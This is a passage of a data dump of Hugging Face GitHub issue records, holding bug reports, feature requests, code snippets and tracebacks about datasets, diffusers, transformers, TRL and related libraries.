HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\r\n- HF_HUB_ETAG_TIMEOUT: 10\r\n- HF_HUB_DOWNLOAD_TIMEOUT: 10\r\n\r\n{'huggingface_hub version': '0.24.6',\r\n 'Platform': 'Linux-6.5.0-45-generic-x86_64-with-glibc2.35',\r\n 'Python version': 
'3.10.12',\r\n 'Running in iPython ?': 'Yes',\r\n 'iPython shell': 'ZM", "url": "https://github.com/huggingface/huggingface_hub/issues/2468", "state": "closed", "labels": [], "created_at": "2024-08-20T15:13:13Z", "updated_at": "2024-08-27T16:22:14Z", "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7116, "title": "datasets cannot handle nested json if features is given.", "body": "### Describe the bug\n\nI have a json named temp.json.\r\n```json\r\n{\"ref1\": \"ABC\", \"ref2\": \"DEF\", \"cuts\":[{\"cut1\": 3, \"cut2\": 5}]}\r\n```\r\nI want to load it.\r\n```python\r\nds = datasets.load_dataset('json', data_files=\"./temp.json\", features=datasets.Features({\r\n 'ref1': datasets.Value('string'),\r\n 'ref2': datasets.Value('string'),\r\n 'cuts': datasets.Sequence({\r\n \"cut1\": datasets.Value(\"uint16\"),\r\n \"cut2\": datasets.Value(\"uint16\")\r\n })\r\n}))\r\n```\r\nThe above code does not work. However, I can load it without giving features.\r\n```python\r\nds = datasets.load_dataset('json', data_files=\"./temp.json\")\r\n```\r\nIs it possible to load integers as uint16 to save some memory?\n\n### Steps to reproduce the bug\n\nAs in the bug description.\n\n### Expected behavior\n\nThe data are loaded and integers are uint16.\n\n### Environment info\n\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- `datasets` version: 2.21.0\r\n- Platform: Linux-5.15.0-118-generic-x86_64-with-glibc2.35\r\n- Python version: 3.11.9\r\n- `huggingface_hub` version: 0.24.5\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.5.0", "url": "https://github.com/huggingface/datasets/issues/7116", "state": "closed", "labels": [], "created_at": "2024-08-20T12:27:49Z", "updated_at": "2024-09-03T10:18:23Z", "comments": 3, "user": "ljw20180420" }, { "repo": "huggingface/datasets", "number": 7113, "title": "Stream dataset does not iterate if the batch size is larger than the dataset size (related to drop_last_batch)", "body": "### Describe the bug\r\n\r\nHi there,\r\n\r\nI use streaming and interleaving to combine multiple datasets saved in jsonl files. The size of dataset can vary (from 100ish to 100k-ish). I use dataset.map() and a big batch size to reduce the IO cost. It was working fine with datasets-2.16.1 but this problem shows up after I upgraded to datasets-2.19.2. 
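\r\n(An aside on the nested-JSON question above (#7116), a sketch based on the `datasets` feature-syntax docs: declaring the nested field with plain list syntax `[{...}]` matches a list-of-dicts JSON layout, whereas `Sequence({...})` expects a dict-of-lists layout - and the narrower integer types can then be applied:)\r\n\r\n```python\r\nimport datasets\r\n\r\nfeatures = datasets.Features({\r\n    \"ref1\": datasets.Value(\"string\"),\r\n    \"ref2\": datasets.Value(\"string\"),\r\n    # list of dicts, each entry holding uint16 values\r\n    \"cuts\": [{\"cut1\": datasets.Value(\"uint16\"), \"cut2\": datasets.Value(\"uint16\")}],\r\n})\r\nds = datasets.load_dataset(\"json\", data_files=\"./temp.json\", features=features)\r\n```\r\n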
With 2.21.0 the streaming problem described above remains.\r\n\r\nPlease see the code below to reproduce the problem.\r\n\r\nThe dataset can iterate correctly if we set either streaming=False or drop_last_batch=False.\r\n\r\nI have to use drop_last_batch=True since it's for distributed training.\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\n# datasets==2.21.0\r\nimport datasets\r\ndef data_prepare(examples):\r\n print(examples[\"sentence1\"][0])\r\n return examples\r\n\r\nbatch_size = 101\r\n# the size of the dataset is 100\r\n# the dataset iterates correctly if we set either streaming=False or drop_last_batch=False \r\ndataset = datasets.load_dataset(\"mteb/biosses-sts\", split=\"test\", streaming=True)\r\ndataset = dataset.map(lambda x: data_prepare(x),\r\n drop_last_batch=True,\r\n batched=True, batch_size=batch_size)\r\nfor ex in dataset:\r\n print(ex)\r\n pass\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nThe dataset iterates regardless of the batch size.\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.21.0\r\n- Platform: Linux-6.1.58+-x86_64-with-glibc2.35\r\n- Python version: 3.10.14\r\n- `huggingface_hub` version: 0.24.5\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.2.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7113", "state": "closed", "labels": [], "created_at": "2024-08-20T08:26:40Z", "updated_at": "2024-08-26T04:24:11Z", "comments": 1, "user": "memray" }, { "repo": "huggingface/diffusers", "number": 9216, "title": "I made a pipeline that lets you use any number of models at once", "body": "### Model/Pipeline/Scheduler description\n\nHere's how to do it:\r\n\r\n```python\r\nimport torch\r\n\r\n# apply_multiModel comes from the RubberDiffusers repo linked below\r\nfrom rubberDiffusers import StableDiffusionRubberPipeline\r\n\r\npipe = StableDiffusionRubberPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\", torch_dtype=torch.float32, local_files_only=True, safety_checker=None, requires_safety_checker=False,\r\n)\r\n\r\npipe2 = StableDiffusionRubberPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\", torch_dtype=torch.float32, local_files_only=True, safety_checker=None, requires_safety_checker=False,\r\n)\r\n\r\napply_multiModel(pipe)\r\npipe.added_model = [pipe2]\r\nimage = pipe(\"your prompt\", width=512, height=512, pos=[\"0:0-512:512\"], mask_strengths=[.5], model_kwargs=[{\"prompt\": \"your prompt for the first loaded model\"}]).images[0]\r\n```\r\n\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://github.com/alexblattner/RubberDiffusers", "url": "https://github.com/huggingface/diffusers/issues/9216", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-19T11:46:08Z", "updated_at": "2024-09-21T15:03:31Z", "comments": 3, "user": "alexblattner" }, { "repo": "huggingface/transformers", "number": 32873, "title": "How to use [examples/pytorch/contrastive-image-text] to run inference", "body": "### Feature request\n\nI have reviewed the training code for CLIP and successfully executed it. 
Now, I want to use the obtained model for inference testing.\r\n\n\n### Motivation\n\nI would like to test the performance of the model I have trained.\r\n\n\n### Your contribution\n\nI hope I can get an example script for inference testing, like the script below:\r\n\r\n```\r\npython examples/pytorch/contrastive-image-text/run_clip.py \\\r\n --output_dir ./clip-roberta-finetuned \\\r\n --model_name_or_path ./clip-roberta \\\r\n --data_dir $PWD/data \\\r\n --dataset_name ydshieh/coco_dataset_script \\\r\n --dataset_config_name=2017 \\\r\n --image_column image_path \\\r\n --caption_column caption \\\r\n --remove_unused_columns=False \\\r\n --do_train --do_eval \\\r\n --per_device_train_batch_size=\"64\" \\\r\n --per_device_eval_batch_size=\"64\" \\\r\n --learning_rate=\"5e-5\" --warmup_steps=\"0\" --weight_decay 0.1 \\\r\n --overwrite_output_dir \\\r\n --push_to_hub\r\n```", "url": "https://github.com/huggingface/transformers/issues/32873", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-08-19T05:54:54Z", "updated_at": "2024-08-19T08:33:50Z", "user": "rendaoyuan" }, { "repo": "huggingface/chat-ui", "number": 1415, "title": "Bad request: Task not found for this model", "body": "Hi all,\r\nI am facing the following issue when using HuggingFaceEndpoint for my custom fine-tuned model in my repository \"Nithish-2001/RAG-29520hd0-1-chat-finetune\", which is public, with Gradio. \r\n\r\nllm_name: Nithish-2001/RAG-29520hd0-1-chat-finetune\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/huggingface_hub/utils/_errors.py\", line 304, in hf_raise_for_status\r\n response.raise_for_status()\r\n File \"/usr/local/lib/python3.10/dist-packages/requests/models.py\", line 1024, in raise_for_status\r\n raise HTTPError(http_error_msg, response=self)\r\nrequests.exceptions.HTTPError: 400 Client Error: Bad Request for url: https://api-inference.huggingface.co/models/Nithish-2001/RAG-29520hd0-1-chat-finetune\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/routes.py\", line 763, in predict\r\n output = await route_utils.call_process_api(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/route_utils.py\", line 288, in call_process_api\r\n output = await app.get_blocks().process_api(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/blocks.py\", line 1931, in process_api\r\n result = await self.call_function(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/blocks.py\", line 1516, in call_function\r\n prediction = await anyio.to_thread.run_sync( # type: ignore\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/to_thread.py\", line 33, in run_sync\r\n return await get_asynclib().run_sync_in_worker_thread(\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/_backends/_asyncio.py\", line 877, in run_sync_in_worker_thread\r\n return await future\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/_backends/_asyncio.py\", line 807, in run\r\n result = context.run(func, *args)\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/utils.py\", line 826, in wrapper\r\n response = f(*args, **kwargs)\r\n File \"\", line 90, in conversation\r\n response = qa_chain.invoke({\"question\": message, \"chat_history\": formatted_chat_history})\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File 
\"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/conversational_retrieval/base.py\", line 169, in _call\r\n answer = self.combine_docs_chain.run(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 603, in run\r\n return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 381, in __call__\r\n return self.invoke(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/combine_documents/base.py\", line 138, in _call\r\n output, extra_return_dict = self.combine_docs(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/combine_documents/stuff.py\", line 257, in combine_docs\r\n return self.llm_chain.predict(callbacks=callbacks, **inputs), {}\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 316, in predict\r\n return self(kwargs, callbacks=callbacks)[self.output_key]\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 381, in __call__\r\n return self.invoke(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 126, in _call\r\n response = self.generate([inputs], run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 138, in generate\r\n return self.llm.generate_prompt(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/language_models/llms.py\", line 750, in generate_prompt\r\n return self.generate(prompt_strings, stop=stop, callbacks=callbacks, **kwargs)\r\n File", "url": "https://github.com/huggingface/chat-ui/issues/1415", "state": "open", "labels": [ "support" ], "created_at": "2024-08-18T09:33:10Z", "updated_at": "2024-08-25T22:38:00Z", "comments": 1, "user": "NITHISH-Projects" }, { "repo": "huggingface/sentence-transformers", "number": 2893, "title": "how to finetune sentence-transformers with unsupervised methods?", "body": "how to finetune sentence-transformers with unsupervised methods? 
for semantic search", "url": "https://github.com/huggingface/sentence-transformers/issues/2893", "state": "closed", "labels": [], "created_at": "2024-08-17T02:32:09Z", "updated_at": "2024-08-18T02:51:29Z", "user": "keyuchen21" }, { "repo": "huggingface/diffusers", "number": 9205, "title": "Can we pass output_attentions=True to DiT model such as pixart to get attention output?", "body": "Can we pass output_attentions=True to DiT model such as pixart to get attention output? Like using output_attentions=True in transformer?", "url": "https://github.com/huggingface/diffusers/issues/9205", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-16T17:26:14Z", "updated_at": "2024-09-16T15:02:42Z", "comments": 1, "user": "foreverpiano" }, { "repo": "huggingface/datatrove", "number": 266, "title": "How to look into the processed data?", "body": "Hi,\r\n\r\nAfter running `tokenize_from_hf_to_s3.py`, I would like to inspect the resulting data. But I find that the current data is in a binary file (`.ds`). is there a way to allow me to look into the data?\r\n\r\nThanks!", "url": "https://github.com/huggingface/datatrove/issues/266", "state": "open", "labels": [], "created_at": "2024-08-16T16:54:45Z", "updated_at": "2024-08-29T15:26:35Z", "user": "shizhediao" }, { "repo": "huggingface/trl", "number": 1934, "title": "How to Save the PPOTrainer?", "body": "The previous issue for this question https://github.com/huggingface/trl/issues/1643#issue-2294886330 is closed but remained unanswered. If I do `ppo_trainer.save_pretrained('path/to/a/folder')` and then `ppo_trainer.from_pretrained('path/to/that/folder')`, I get this error:\r\n\r\nValueError: tokenizer must be a PreTrainedTokenizerBase like a PreTrainedTokenizer or a PreTrainedTokenizerFast, got \r\n\r\nIt seems that the `PPOTrainer` object does not implement the two functions from `huggingface_hub.PyTorchModelHubMixin`. How should I save my trainer then?", "url": "https://github.com/huggingface/trl/issues/1934", "state": "closed", "labels": [], "created_at": "2024-08-16T09:41:39Z", "updated_at": "2024-10-07T14:57:51Z", "user": "ThisGuyIsNotAJumpingBear" }, { "repo": "huggingface/parler-tts", "number": 109, "title": "How many epoch of training did you do? What is the accuracy?", "body": "How many epoch of training did you do? What is the accuracy?", "url": "https://github.com/huggingface/parler-tts/issues/109", "state": "open", "labels": [], "created_at": "2024-08-16T09:35:31Z", "updated_at": "2024-08-16T09:35:31Z", "user": "xuezhongfei2008" }, { "repo": "huggingface/diffusers", "number": 9195, "title": "Problem with Flux Schnell bfloat16 multiGPU", "body": "### Describe the bug\r\n\r\nHello! 
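A note on the unsupervised fine-tuning question above (sentence-transformers #2893): one well-documented recipe for semantic search is TSDAE, which needs only raw in-domain sentences. A minimal sketch following the library's documented TSDAE usage — the sentence list is placeholder data, and the default noise function requires `nltk`:

```python
from torch.utils.data import DataLoader
from sentence_transformers import SentenceTransformer, datasets, losses, models

# Placeholder corpus: replace with your own unlabeled, in-domain sentences.
sentences = [
    "A sentence from my corpus.",
    "Another unlabeled sentence.",
    "Semantic search works better after domain adaptation.",
]

# Fresh encoder; TSDAE is usually trained with CLS pooling.
word_embedding = models.Transformer("bert-base-uncased")
pooling = models.Pooling(word_embedding.get_word_embedding_dimension(), "cls")
model = SentenceTransformer(modules=[word_embedding, pooling])

# The dataset corrupts each sentence (token deletion; needs nltk punkt),
# and the loss trains the encoder to reconstruct the original.
train_dataset = datasets.DenoisingAutoEncoderDataset(sentences)
train_dataloader = DataLoader(train_dataset, batch_size=8, shuffle=True)
train_loss = losses.DenoisingAutoEncoderLoss(model, tie_encoder_decoder=True)

model.fit(
    train_objectives=[(train_dataloader, train_loss)],
    epochs=1,
    weight_decay=0,
    scheduler="constantlr",
    optimizer_params={"lr": 3e-5},
    show_progress_bar=True,
)
model.save("tsdae-model")
```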
I set device_map='balanced' and get images generated in 2.5 minutes (expected in 12-20 seconds), while in pipe.hf_device_map it shows that the devices are distributed like this:\r\n```\r\n{\r\n \"transformer\": \"cuda:0\",\r\n \"text_encoder_2\": \"cuda:2\",\r\n \"text_encoder\": \"cuda:0\",\r\n \"vae\": \"cuda:1\"\r\n }\r\n```\r\nI have 3 video cards 3090 Ti 24 GB and I can\u2019t run it on them.\r\n\r\nI also tried this way:\r\n pipe.transformer.to('cuda:2')\r\n pipe.text_encoder.to('cuda:2')\r\n pipe.text_encoder_2.to('cuda:1')\r\n pipe.vae.to('cuda:0')\r\n\r\nWhat is the best way to launch it so that generation occurs on the GPU and quickly?\r\n\r\n### Reproduction\r\n```python\r\n pipe = FluxPipeline.from_pretrained(\r\n path_chkpt,\r\n torch_dtype=torch.bfloat16,\r\n device_map='balanced',\r\n )\r\n```\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 22.04 3 GPU: 3090 TI 24 GB\r\n\r\naccelerate==0.30.1\r\naddict==2.4.0\r\napscheduler==3.9.1\r\nautocorrect==2.5.0\r\nchardet==4.0.0\r\ncryptography==37.0.2\r\ncurl_cffi\r\ndiffusers==0.30.0\r\nbeautifulsoup4==4.11.2\r\neinops\r\nfacexlib>=0.2.5\r\nfastapi==0.92.0\r\nhidiffusion==0.1.6\r\ninvisible-watermark>=0.2.0\r\nnumpy==1.24.3\r\nopencv-python==4.8.0.74\r\npandas==2.0.3\r\npycocotools==2.0.6\r\npymystem3==0.2.0\r\npyyaml==6.0\r\npyjwt==2.6.0\r\npython-multipart==0.0.5\r\npytrends==4.9.1\r\npsycopg2-binary\r\nrealesrgan==0.3.0\r\nredis==4.5.1\r\nsacremoses==0.0.53\r\nselenium==4.2.0\r\nsentencepiece==0.1.97\r\nscipy==1.10.1\r\nscikit-learn==0.24.1\r\nsupervision==0.16.0\r\ntb-nightly==2.14.0a20230629\r\ntensorboard>=2.13.0\r\ntomesd\r\ntransformers==4.40.1\r\ntimm==0.9.16\r\nyapf==0.32.0\r\nuvicorn==0.20.0\r\n\r\nspacy==3.7.2\r\nnest_asyncio==1.5.8\r\nhttpx==0.25.0\r\n\r\ntorchvision==0.15.2\r\n\r\ninsightface==0.7.3\r\npsutil==5.9.6\r\ntk==0.1.0\r\ncustomtkinter==5.2.1\r\ntensorflow==2.13.0\r\nopennsfw2==0.10.2\r\nprotobuf==4.24.4\r\ngfpgan==1.3.8\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9195", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-16T06:30:54Z", "updated_at": "2025-12-05T06:38:14Z", "comments": 26, "user": "OlegRuban-ai" }, { "repo": "huggingface/diffusers", "number": 9184, "title": "What is the correct way to apply the dictionary with the control strengths (called \u201cscales\u201d) but with blocks?", "body": "### Describe the bug\n\nI have managed to apply the basic dictionary. 
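For the multi-GPU Flux report above (diffusers #9195), a hedged sketch of the two usual setups: `device_map="balanced"` with an explicit per-GPU `max_memory` budget, or a single GPU with CPU offload. The model id and memory caps are illustrative, not taken from the issue:

```python
import torch
from diffusers import FluxPipeline

# Option 1: shard components across GPUs, capping each card so the large
# transformer is not co-located with both text encoders.
pipe = FluxPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-schnell",
    torch_dtype=torch.bfloat16,
    device_map="balanced",
    max_memory={0: "22GiB", 1: "22GiB", 2: "22GiB"},
)

# Option 2 (often simpler on 24 GB cards): one GPU plus CPU offload of the
# components that are idle at each stage.
# pipe = FluxPipeline.from_pretrained(
#     "black-forest-labs/FLUX.1-schnell", torch_dtype=torch.bfloat16
# )
# pipe.enable_model_cpu_offload()

image = pipe(
    "a photo of a forest", num_inference_steps=4, guidance_scale=0.0
).images[0]
image.save("flux-schnell.png")
```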
as the documentation mentions\r\n\r\n```\r\nadapter_weight_scales = { \"unet\": { \"down\": 1, \"mid\": 0, \"up\": 0} }\r\npipe.set_adapters(\"Lora1\", adapter_weight_scales)\r\n```\r\n\r\nand it already works for N number of LORAS that I want to load, for example\r\n\r\n```\r\nadapter_weight_scales_1 = { \"unet\": { \"down\": 0.5, \"mid\": 0, \"up\": 0} }\r\nadapter_weight_scales_2 = { \"unet\": { \"down\": 0, \"mid\": 0, \"up\": 0.5} }\r\npipe.set_adapters([\"Lora1\", \"Lora2\"], [adapter_weight_scales_1, adapter_weight_scales_2])\r\n\r\n```\r\nit works for me correctly, and I get very good results in my images\r\n\r\n\n\n### Reproduction\n\nNow I'm trying to apply the scaling dictionary to LORA but with blocks, for example:\r\n\r\n```\r\nadapter_weight_scales_blocks_1 = {\r\n 'unet': {\r\n 'down': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.2]}, \r\n 'mid': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.2]}, \r\n 'up': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.5, 0.2]\r\n }\r\n }\r\n }\r\n\r\n adapter_weight_scales_blocks_2 = {\r\n 'unet': {\r\n 'down': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5]}, \r\n 'mid': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5]}, \r\n 'up': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5, 0.5]\r\n }\r\n }\r\n }\r\n\r\n\r\npipe.set_adapters([\"Lora1\", \"Lora2\"], [ adapter_weight_scales_blocks_1, adapter_weight_scales_blocks_2])\r\n```\r\n\n\n### Logs\n\n```shell\nbut an error like this is getting me:\r\n\r\n\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/loaders/lora_base.py in set_adapters(self, adapter_names, adapter_weights)\r\n 571 \r\n 572 if issubclass(model.__class__, ModelMixin):\r\n--> 573 model.set_adapters(adapter_names, _component_adapter_weights[component])\r\n 574 elif issubclass(model.__class__, PreTrainedModel):\r\n 575 set_adapters_for_text_encoder(adapter_names, model, _component_adapter_weights[component])\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/loaders/peft.py in set_adapters(self, adapter_names, weights)\r\n 107 weights = scale_expansion_fn(self, weights)\r\n 108 \r\n--> 109 set_weights_and_activate_adapters(self, adapter_names, weights)\r\n 110 \r\n 111 def add_adapter(self, adapter_config, adapter_name: str = \"default\") -> None:\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/utils/peft_utils.py in set_weights_and_activate_adapters(model, adapter_names, weights)\r\n 264 else:\r\n 265 module.active_adapter = adapter_name\r\n--> 266 module.set_scale(adapter_name, get_module_weight(weight, module_name))\r\n 267 \r\n 268 # set multiple active adapters\r\n\r\n/usr/local/lib/python3.10/dist-packages/peft/tuners/lora/layer.py in set_scale(self, adapter, scale)\r\n 278 # Ignore the case where the adapter is not in the layer\r\n 279 return\r\n--> 280 self.scaling[adapter] = scale * self.lora_alpha[adapter] / self.r[adapter]\r\n 281 \r\n 282 def scale_layer(self, scale: float) -> None:\r\n\r\nTypeError: unsupported operand type(s) for *: 'dict' and 'float'``\r\n```\r\n\r\n\r\nWhat would be the correct way to do it?\n```\n\n\n### System Info\n\nSystem Info\r\nI am using google colab,\r\ndiffusers version: 0.30.0\r\nPython version: 3.10.\r\n\n\n### Who can help?\n\nDiffuser masters can help me understand how to use that feature: @sayakpaul, @yiyixuxu @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9184", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-15T06:05:42Z", "updated_at": "2024-08-17T00:54:28Z", "user": 
"Eduardishion" }, { "repo": "huggingface/diffusers", "number": 9180, "title": "Pipeline has no attribute '_execution_device'", "body": "### Describe the bug\r\n\r\nHello, I implemented my own custom pipeline referring StableDiffusionPipeline (RepDiffusionPipeline), but there are some issues\r\nI called \"accelerator.prepare\" properly, and mapped the models on device (with \"to.(accelerator.device)\")\r\nBut when I call pipeline and the '__call__' function is called, sometimes I met the error \r\nIt is not only problem in using multi-gpu, it occurs when I use single gpu. \r\nFor example, I defined my pipeline for my validation in training code like this: \r\n```python\r\nval_pipe = RepDiffusionPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\",\r\n unet=accelerator.unwrap_model(unet),\r\n rep_encoder=accelerator.unwrap_model(rep_encoder),\r\n vae=accelerator.unwrap_model(vae),\r\n revision=None, variant=None, torch_dtype=weight_dtype, safety_checker=None\r\n ).to(accelerator.device)\r\n```\r\n then, when I called 'val_pipe' like this: \r\n```\r\nmodel_pred = val_pipe(\r\n image = condition_original_image if args.val_mask_op else data[\"original_images\"],\r\n representation = representation,\r\n prompt = \"\",\r\n num_inference_steps = 20,\r\n image_guidance_scale = 1.5,\r\n guidance_scale = scale,\r\n generator = generator\r\n ).images[0]\r\n``` \r\n \r\nAt that time, the error \"RepDiffusionPipeline has no attribute '_execution_device'\" occurs. (Not always, just randomly)\r\nHow can I solve this issue, or what part of my code can be doubted and fixed?\r\nThank you for reading:)\r\n\r\n### Reproduction\r\n\r\nIt occurs randomly, so there is no option to reproduce... \r\n\r\nBut when I call the defined pipeline, it occurs randomly. \r\n\r\n### Logs\r\n\r\n```shell\r\nRepDiffusionPipeline has no attribute '_execution_device'\r\n```\r\n\r\n\r\n### System Info\r\n\r\nI tried to test in various diffusers & python versions, but the problem still occurs. \r\nIn now, I am running my code in diffusers 0.27.2, python 3.10.14. \r\n\r\nWARNING[XFORMERS]: xFormers can't load C++/CUDA extensions. 
xFormers was built for:\r\n PyTorch 2.2.2+cu121 with CUDA 1201 (you have 2.2.2+cu118)\r\n Python 3.10.14 (you have 3.10.14)\r\n Please reinstall xformers (see https://github.com/facebookresearch/xformers#installing-xformers)\r\n Memory-efficient attention, SwiGLU, sparse and more won't be available.\r\n Set XFORMERS_MORE_DETAILS=1 for more details\r\n\r\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- `diffusers` version: 0.27.2\r\n- Platform: Linux-5.4.0-132-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.14\r\n- PyTorch version (GPU?): 2.2.2+cu118 (True)\r\n- Huggingface_hub version: 0.24.3\r\n- Transformers version: 4.43.3\r\n- Accelerate version: 0.33.0\r\n- xFormers version: 0.0.25.post1\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@sayakpaul @yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/9180", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-14T14:43:15Z", "updated_at": "2025-11-18T13:22:52Z", "comments": 33, "user": "choidaedae" }, { "repo": "huggingface/diffusers", "number": 9174, "title": "[Quantization] bring quantization to diffusers core", "body": "Now that we have a working PoC (#9165) of NF4 quantization through `bitsandbytes` and also [this](https://huggingface.co/blog/quanto-diffusers) through `optimum.quanto`, it's time to bring in quantization more formally in `diffusers` \ud83c\udfb8\r\n\r\nIn this issue, I want to devise a rough plan to attack the integration. We are going to start with `bitsandbytes` and then slowly increase the list of our supported quantizers based on community interest. This integration will also allow us to do LoRA fine-tuning of large models like [Flux](https://huggingface.co/docs/diffusers/main/en/api/pipelines/flux) through `peft` ([guide](https://huggingface.co/docs/peft/en/developer_guides/quantization)). \r\n\r\nThree PRs are expected: \r\n\r\n- [ ] Introduce a [base quantization config class](https://github.com/huggingface/transformers/blob/main/src/transformers/quantizers/base.py) like we have in `transformers`. \r\n- [ ] Introduce `bitsandbytes` related utilities to handle processing, post-processing of layers for injecting `bitsandbytes` layers. Example is [here](https://github.com/huggingface/transformers/blob/main/src/transformers/integrations/bitsandbytes.py). \r\n- [ ] Introduce a `bitsandbytes` config ([example](https://github.com/huggingface/transformers/blob/main/src/transformers/quantizers/quantizer_bnb_4bit.py)) and quantization loader mixin aka `QuantizationLoaderMixin`. This loader will enable passing a quantization config to `from_pretrained()` of a `ModelMixin` and will tackle how to modify and prepare the model for the provided quantization config. This will also allow us to serialize the model according to the quantization config. \r\n\r\n--- \r\n\r\nNotes:\r\n\r\n* We could have done this with `accelerate` ([guide](https://huggingface.co/docs/accelerate/en/usage_guides/quantization)) but this doesn't yet support NF4 serialization. \r\n* Good example PR: https://github.com/huggingface/transformers/pull/32306\r\n\r\n---\r\n\r\n@DN6 @SunMarc sounds good? 
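As an illustration of the usage shape the quantization issue above (diffusers #9174) was aiming at — note the `BitsAndBytesConfig` import from `diffusers` only exists in versions released after this issue, so treat this strictly as a sketch:

```python
import torch
from diffusers import BitsAndBytesConfig, FluxPipeline, FluxTransformer2DModel

# NF4 4-bit config mirroring the transformers-style quantization API.
nf4_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,
)

# Quantize only the large transformer; the rest of the pipeline is unchanged.
transformer = FluxTransformer2DModel.from_pretrained(
    "black-forest-labs/FLUX.1-dev",
    subfolder="transformer",
    quantization_config=nf4_config,
    torch_dtype=torch.bfloat16,
)
pipe = FluxPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-dev",
    transformer=transformer,
    torch_dtype=torch.bfloat16,
)
pipe.enable_model_cpu_offload()
```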
